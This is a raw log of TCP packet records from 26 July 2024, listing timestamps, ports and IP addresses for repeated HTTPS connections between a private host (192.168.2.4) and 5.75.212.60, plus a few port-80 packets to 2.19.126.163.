Jul 26, 2024 18:56:25.357920885 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.357989073 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.358002901 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.358059883 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.363430023 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.363450050 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.363488913 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.363513947 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.363527060 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.363557100 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.363574028 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.363575935 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.363627911 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.363828897 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.363862991 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.365000010 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.365048885 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.365211964 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.365485907 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.365514994 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.700391054 CEST	49723	80	192.168.2.4	2.19.126.163
Jul 26, 2024 18:56:25.729140043 CEST	80	49723	2.19.126.163	192.168.2.4
Jul 26, 2024 18:56:25.729302883 CEST	49723	80	192.168.2.4	2.19.126.163
Jul 26, 2024 18:56:26.038243055 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.038487911 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.039143085 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.039170980 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.048897982 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.048918009 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.490530014 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.490567923 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.490583897 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.490590096 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.490608931 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.490619898 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.490643978 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.490672112 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.490689039 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.528579950 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.528611898 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.528664112 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.528687954 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.528704882 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.528724909 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.592730999 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.592762947 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.592813015 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.592878103 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.592911959 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.592932940 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.622962952 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.622988939 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.623198032 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.623218060 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.623265028 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.664841890 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.664864063 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.664926052 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.664932013 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.664969921 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.698724031 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.698745012 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.698848009 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.698863983 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.698940992 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.720807076 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.720828056 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.720915079 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.720942020 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.720983982 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.732292891 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.732321024 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.732382059 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.732405901 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.732446909 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.746874094 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.746910095 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.746963024 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.746994972 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.747013092 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.747034073 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.766206026 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.766225100 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.766352892 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.766429901 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.768548965 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.779880047 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.779900074 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.780006886 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.780029058 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.780086040 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.818737030 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.818758965 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.819010973 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.819041014 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.819118977 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.844950914 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.844974995 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.845108986 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.845136881 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.845177889 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.848807096 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.848826885 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.848896980 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.848917007 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.848956108 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.860430956 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.860449076 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.860526085 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.860549927 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.860593081 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.873281956 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.873301983 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.873394012 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.873416901 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.873464108 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.883893013 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.883913994 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.884020090 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.884044886 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.884090900 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.893430948 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.893450975 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.893518925 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.893534899 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.893594027 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.901808977 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.901829958 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.901937962 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.901952028 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.902009010 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.908963919 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.908993006 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.909148932 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.909163952 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.909228086 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.927504063 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.927525043 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.927633047 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.927648067 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.927711964 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.933881998 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.933900118 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.933974028 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.933988094 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.934051037 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.939671040 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.939691067 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.939766884 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.939779997 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.939838886 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.944698095 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.944720030 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.944791079 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.944803953 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.944864988 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.952835083 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.952856064 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.952935934 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.952950954 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.953006983 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.958873034 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.958890915 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.958961964 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.958977938 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.959006071 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.959023952 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.962810040 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.962827921 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.962891102 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.962903976 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.962960005 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.965043068 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.965117931 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.965131044 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.965154886 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.965281963 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.965326071 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.965353012 CEST	443	49750	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.965435982 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.965478897 CEST	49750	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.966449976 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.966481924 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:26.966566086 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.966944933 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:26.966958046 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:27.655546904 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:27.655633926 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:27.656244993 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:27.656256914 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:27.663249016 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:27.663265944 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.092623949 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.092654943 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.092675924 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.092780113 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.092798948 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.092853069 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.123614073 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.123646021 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.123776913 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.123788118 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.123836040 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.192011118 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.192050934 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.192213058 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.192225933 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.192275047 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.259404898 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.259435892 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.259563923 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.259576082 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.259624004 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.263494015 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.263513088 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.263562918 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.263569117 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.263605118 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.263628960 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.332573891 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.332602978 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.332668066 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.332688093 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.332860947 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.332860947 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.335067987 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.335092068 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.335140944 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.335155964 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.335186958 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.335216045 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.353148937 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.353173971 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.353229046 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.353235960 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.353274107 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.353303909 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.410535097 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.410567045 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.410624027 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.410633087 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.410649061 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.410672903 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.413141012 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.413161993 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.413208008 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.413216114 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.413252115 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.413275957 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.421665907 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.421693087 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.421744108 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.421752930 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.421787977 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.421828032 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.429986000 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.430006027 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.430069923 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.430077076 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.430090904 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.430125952 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.457046986 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.457079887 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.457135916 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.457170010 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.457189083 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.457214117 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.463239908 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.463263988 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.463308096 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.463315010 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.463345051 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.463366032 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.465078115 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.465137959 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.465143919 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.465152979 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.465193987 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.465217113 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.473577976 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.473617077 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.473642111 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.473648071 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.473681927 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.473702908 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.473705053 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.473753929 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.473828077 CEST	49751	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.473843098 CEST	443	49751	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.474687099 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.474711895 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:28.474780083 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.474978924 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:28.474988937 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.211810112 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.211958885 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.212591887 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.212605953 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.214683056 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.214689970 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.649436951 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.649473906 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.649492979 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.649524927 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.649558067 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.649568081 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.649612904 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.682653904 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.682693958 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.682765007 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.682775974 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.682815075 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.745676994 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.745712996 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.745841026 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.745872974 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.745920897 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.777288914 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.777314901 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.777436972 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.777452946 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.777506113 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.816159964 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.816222906 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.816386938 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.816406965 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.816525936 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.817131042 CEST	49752	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.817156076 CEST	443	49752	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.818206072 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.818274021 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:29.818370104 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:29.818640947 CEST	49753	443	192.168.2.4	5.75.212.60
